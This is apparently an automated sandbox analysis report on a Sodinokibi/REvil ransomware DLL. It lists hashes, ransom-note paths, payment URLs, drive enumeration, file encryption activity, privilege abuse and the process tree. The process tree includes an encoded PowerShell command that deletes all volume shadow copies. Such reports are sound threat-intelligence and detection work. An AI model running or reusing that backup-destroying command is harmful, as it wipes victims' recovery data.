Analysis
-
max time kernel
93s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
27-09-2024 07:32
Behavioral task
behavioral1
Sample
f9fc3de9c93b204279d32d682d6607b3_JaffaCakes118.dll
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
f9fc3de9c93b204279d32d682d6607b3_JaffaCakes118.dll
Resource
win10v2004-20240802-en
General
-
Target
f9fc3de9c93b204279d32d682d6607b3_JaffaCakes118.dll
-
Size
164KB
-
MD5
f9fc3de9c93b204279d32d682d6607b3
-
SHA1
c63832b46663954e5bd1791190302f97153e1102
-
SHA256
421867abea3ce5f660f9cf6ec1dc62a57d92edc122638d81e7a2d4ec389dd27a
-
SHA512
520e9ccfc7196cac3a27e8ee6c6f7daaa46717e4e88f08106dd693ac9f13b1bbb3e30ea08e245cd2ed8088ab672ea1708c5aa963535465b4b86a58dc2dd0ef3a
-
SSDEEP
3072:v0XoUeZ/DVS8L73ea4MoCLfqQvFfx8JIn+E:veoUeZR2TRCWQFfx8C
Malware Config
Extracted
C:\Users\f4ph8-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E4198CE52E05A18D
http://decryptor.cc/E4198CE52E05A18D
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\D: rundll32.exe -
Drops file in Program Files directory 35 IoCs
description ioc Process File opened for modification \??\c:\program files\PopRemove.M2T rundll32.exe File opened for modification \??\c:\program files\WatchBlock.DVR-MS rundll32.exe File opened for modification \??\c:\program files\ConvertFromUnlock.bmp rundll32.exe File opened for modification \??\c:\program files\EditOptimize.mp4 rundll32.exe File opened for modification \??\c:\program files\NewCompare.wmv rundll32.exe File opened for modification \??\c:\program files\RequestJoin.pcx rundll32.exe File opened for modification \??\c:\program files\UnprotectConnect.png rundll32.exe File opened for modification \??\c:\program files\UnprotectUninstall.vsw rundll32.exe File opened for modification \??\c:\program files\CompleteConfirm.M2V rundll32.exe File opened for modification \??\c:\program files\GroupImport.M2T rundll32.exe File opened for modification \??\c:\program files\SplitRename.ps1xml rundll32.exe File opened for modification \??\c:\program files\UnregisterLock.ini rundll32.exe File opened for modification \??\c:\program files\ConvertToEnter.eps rundll32.exe File opened for modification \??\c:\program files\RevokeLimit.gif rundll32.exe File opened for modification \??\c:\program files\DisconnectCompress.3g2 rundll32.exe File opened for modification \??\c:\program files\PingBlock.wmv rundll32.exe File opened for modification \??\c:\program files\RepairProtect.M2TS rundll32.exe File opened for modification \??\c:\program files\CopyOut.js rundll32.exe File opened for modification \??\c:\program files\DisableSend.mht rundll32.exe File opened for modification \??\c:\program files\HidePop.AAC rundll32.exe File opened for modification \??\c:\program files\PublishComplete.MTS rundll32.exe File created \??\c:\program files\f4ph8-readme.txt rundll32.exe File opened for modification \??\c:\program files\GroupMove.wav rundll32.exe File opened for modification \??\c:\program files\ProtectDisconnect.css rundll32.exe File opened for modification \??\c:\program files\TestUnprotect.vbs rundll32.exe File opened for modification \??\c:\program files\MeasureEdit.vssm rundll32.exe File opened for modification \??\c:\program files\SwitchRegister.cfg rundll32.exe File opened for modification \??\c:\program files\WriteRestore.otf rundll32.exe File opened for modification \??\c:\program files\CopyNew.inf rundll32.exe File opened for modification \??\c:\program files\InvokeUnprotect.xltx rundll32.exe File opened for modification \??\c:\program files\RequestEnter.jpe rundll32.exe File opened for modification \??\c:\program files\ResumeCheckpoint.jpe rundll32.exe File opened for modification \??\c:\program files\StartDeny.xlsb rundll32.exe File created \??\c:\program files (x86)\f4ph8-readme.txt rundll32.exe File opened for modification \??\c:\program files\ProtectWatch.WTV rundll32.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3152 rundll32.exe 3152 rundll32.exe 2212 powershell.exe 2212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3152 rundll32.exe Token: SeDebugPrivilege 2212 powershell.exe Token: SeBackupPrivilege 2536 vssvc.exe Token: SeRestorePrivilege 2536 vssvc.exe Token: SeAuditPrivilege 2536 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 212 wrote to memory of 3152 212 rundll32.exe 82 PID 212 wrote to memory of 3152 212 rundll32.exe 82 PID 212 wrote to memory of 3152 212 rundll32.exe 82 PID 3152 wrote to memory of 2212 3152 rundll32.exe 83 PID 3152 wrote to memory of 2212 3152 rundll32.exe 83 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\f9fc3de9c93b204279d32d682d6607b3_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\f9fc3de9c93b204279d32d682d6607b3_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:4564
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2536
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5a9f879ed4b50945435ba8789b411d45b
SHA1c141c0296604643fa762f246017cc5212576bcda
SHA25612c8206e33a70acd0721357cd65a4c452a408f4843169b6b790565920f8c59cf
SHA512f8cd3b5264f07db4bd787e591d2b528647387e3a6e53c6ae54b479ee5a0edd312345d88893fb08713db830319ff30e4f57faee424d3ab086c1199b0311f10110